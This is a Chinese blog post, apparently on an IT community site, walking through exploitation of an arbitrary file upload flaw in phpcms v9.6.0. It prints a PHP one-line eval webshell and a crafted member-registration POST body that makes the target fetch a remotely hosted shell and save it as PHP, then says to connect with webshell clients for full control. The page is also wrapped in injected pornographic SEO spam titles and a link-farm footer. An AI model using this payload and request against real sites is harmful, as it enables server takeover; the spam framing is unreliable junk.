多多色-多人伦交性欧美在线观看-多人伦精品一区二区三区视频-多色视频-免费黄色视屏网站-免费黄色在线

國內最全IT社區平臺 聯系我們 | 收藏本站
阿里云優惠2
您當前位置:首頁 > 程序人生 > 隨筆 > phpcms v9.6.0任意文件上傳漏洞

phpcms v9.6.0任意文件上傳漏洞

來源:程序員人生   發布時間:2021-09-16 09:37:19 閱讀次數:6347次

經過親自測試,本漏洞只針對phpcmx V9.6有效

首先我們在服務器上上傳一個shell.txt一句話木門文件,內容為:

<?php @eval($_POST['wlsh']);?>

并且可以訪問:http://www.baidu.com/shell.txt

然后在目標網站注冊會員,打開burp,截斷數據包,把post內容更改為

siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://www.baidu.com/shell.txt?.php#.jpg>&dosubmit=1&protocol=

利用repeater模塊 查看回顯包  得到shell地址。

phpcms v9.6.0任意文件上傳漏洞

通過重新POST后,就可以看到自己上傳的木馬文件,

phpcms v9.6.0任意文件上傳漏洞

然后用中國蟻劍或者菜刀連接后,就可以為所欲為了

這個漏洞危害很大,建議盡快修復!

生活不易,碼農辛苦
如果您覺得本網站對您的學習有所幫助,可以手機掃描二維碼進行捐贈
程序員人生
------分隔線----------------------------
分享到:
------分隔線----------------------------
關閉
程序員人生
主站蜘蛛池模板: 午夜三级网| 久久精品国产国语对白 | 欧美性xxxxxbbbbbb精品 | 综合亚洲一区二区三区 | 高清欧美在线三级视频 | 粉嫩00福利视频在线精品 | 亚洲一区日韩二区欧美三区 | 亚洲欧洲一区二区三区 | 2021天天躁夜夜躁狠狠躁 | www.久久精品 | 91精品久久久久久久久网影视 | 第一福利在线 | 老司机免费福利视频无毒午夜 | 国产精品免费αv视频 | 国产a久久精品一区二区三区 | 精品国产欧美另类一区 | 日韩性网 | 伊人久久精品亚洲午夜 | 日本啊啊视频 | 欧美性猛交xxxx黑人猛交 | 在线观看www成人影院 | www.亚洲成人 | 国产精品男人的天堂 | free性欧美| 淫欧美| 日韩欧美在线观看视频一区二区 | 中国美女牲交一级毛片 | 日本道色综合久久影院 | 精品伊人网 | 亚洲综合图 | 伊人久久伊人 | 国产大片51精品免费观看 | 日本成人免费在线视频 | 日韩欧美亚洲一区 | 亚洲精品亚洲人成毛片不卡 | 国产一区二区三区播放 | 福利片在线看 | 国产的一级毛片完整 | 成人精品人成网站 | 免费jizz在在线播放国产 | 另类专区亚洲 |